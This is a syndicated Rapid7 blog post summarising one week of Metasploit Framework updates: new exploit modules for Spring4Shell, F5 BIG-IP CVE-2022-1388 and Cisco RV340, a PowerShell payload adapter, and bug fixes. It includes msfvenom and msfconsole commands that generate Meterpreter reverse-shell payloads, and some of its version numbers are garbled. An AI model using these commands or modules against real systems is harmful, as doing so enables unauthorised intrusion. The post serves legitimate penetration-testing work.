Post Syndicated from Erin Bleiweiss original https://blog.rapid7.com/2022/05/13/metasploit-weekly-wrap-up-156/
Community contributor vleminator added a new module which exploits CVE-2022-22965—more commonly known as "Spring4Shell." Depending on its deployment configuration, Java Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older can be vulnerable to unauthenticated remote code execution.
F5 BIG-IP iControl RCE via REST Authentication Bypass module
In addition, we have a new module that targets F5 iControl and exploits CVE-2022-1388, from contributor heyder. This vulnerability allows attackers to bypass iControl’s REST authentication on affected versions and achieve unauthenticated remote code execution as
root via the
Cisco RV340 SSL VPN RCE module
The last of the new RCE modules this week—community contributor pedrib added a Cisco RV340 SSL VPN module, which exploits CVE-2022-20699. This module exploits a stack buffer overflow in the default configuration of Cisco RV series routers, and does not require authentication. This module also works over the internet and does not require local network access.
First Class PowerShell Command Payloads
Metasploit has had the ability to execute native 64-bit and 32-bit Windows payloads for quite some time. This functionality was exposed to module authors by way of a mixin which meant that a dedicated target needed to be written. This placed an additional development burden on module authors who wanted to offer powershell commands for in-memory code execution of native payloads. Now module authors can just define the standard command target, and users can select one of the new
cmd/windows/powershell* payloads. The new adapter will convert the native code into a powershell command automatically, without additional effort from the module developer.
Since these are new payload modules, they can also be generated directly using MSFVenom:
./msfvenom -p cmd/windows/powershell/meterpreter/reverse_tcp LHOST=192.168.159.128
This is similar to using one of the
psh- formatters with the existing
-f option. However, because it’s a payload module, the additional Powershell specific options are accessible. For example, the resulting command can be base64-encoded to remove many special characters by setting
New module content (4)
- F5 BIG-IP iControl RCE via REST Authentication Bypass by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits CVE-2022-1388 – A new module has been added for CVE-2022-1388, a vulnerability in F5 BIG-IP 16.1.x versions prior to 220.127.116.11, 15.1.x versions prior to 18.104.22.168, 14.1.x versions prior to 22.214.171.124, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions. By making a special request, one can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the
rootuser on affected systems.
- Cisco RV340 SSL VPN RCE from pedrib, which exploits CVE-2022-20699 – A new module has been added which exploits CVE-2022-20699, an unauthenticated stack overflow RCE vulnerability in the Cisco RV 340 VPN Gateway router. Successful exploitation results in RCE as the
rootuser. This exploit can be triggered over the internet and does not require the attacker to be on the same network as the victim.
- Spring Framework Class property RCE (Spring4Shell) by vleminator, which exploits CVE-2022-22965 – This adds a module that targets CVE-2022-22965, a remote code execution vulnerability in some installations of Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older. To be vulnerable, the application must be running on JDK 9+ and in this case, packaged and deployed as a
warfile, though it may be possible to bypass these limitations later.
- Powershell Command Adapter from zeroSteiner – This adds a new payload adapter for converting native x86 and x64 Windows payloads to command payloads using Powershell.
Enhancements and features (4)
- #16529 from dwelch-r7 – This updates Mettle payloads to support logging to file and now uses the same options as the other Meterpreters. For example within msfconsole:
use osx/x64/meterpreter_reverse_tcp generate -f macho -o shell MeterpreterDebugbuild=true MeterpreterDebugLogging='rpath:/tmp/foo.txt' to_handler
- #16538 from adfoster-r7 – The Python Meterpreter loader library has been updated to address deprecation warnings that were showing when running these payloads using Python 3.4 and later.
- #16551 from adfoster-r7 – The documentation for tomcat_mgr_upload.rb has been updated to include additional information on setting up a vulnerable Docker instance to test the module on.
- #16553 from mauvehed – This updates Metasploit’s
.github/SECURITY.mdfile with the latest steps to follow when raising security issues with Rapid7’s open source projects.
Bugs fixed (8)
- #16485 from jeffmcjunkin – This updates the version check for the
exploit/windows/local/s4u_persistencemodule to allow it to run on later Windows versions.
- #16491 from adfoster-r7 – This fixes a bug whereby Meterpreter sessions and modules would crash when encountering a timeout issue due to using an invalid or deprecated error name.
- #16531 from adfoster-r7 – This fixes a crash in various pihole modules when login authentication is required.
- #16533 from cdelafuente-r7 – This updates the Meterpreter reg command to correctly handle setting the KEY_WOW64 flag with
-w 64– previously these flag values were unintentionally ignored.
- #16540 from adfoster-r7 – This fixes an issue with Zeitwerk trying to load Go packages as part of the boot up process.
- #16542 from sjanusz-r7 – This fixes a bug in msfconsole’s internal book keeping to ensure that closed channels are no longer tracked.
- #16544 from adfoster-r7 – This updates post module
windows/gather/ad_to_sqliteto no longer crash. The module will now additionally store the extracted information as loot.
- #16560 from Ronni3X – This updates the
nessus_connectlogin functionality to correctly handle the
@symbol being present in the password.
As always, you can update to the latest Metasploit Framework with
and you can get more details on the changes since the last blog post from
If you are a
git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).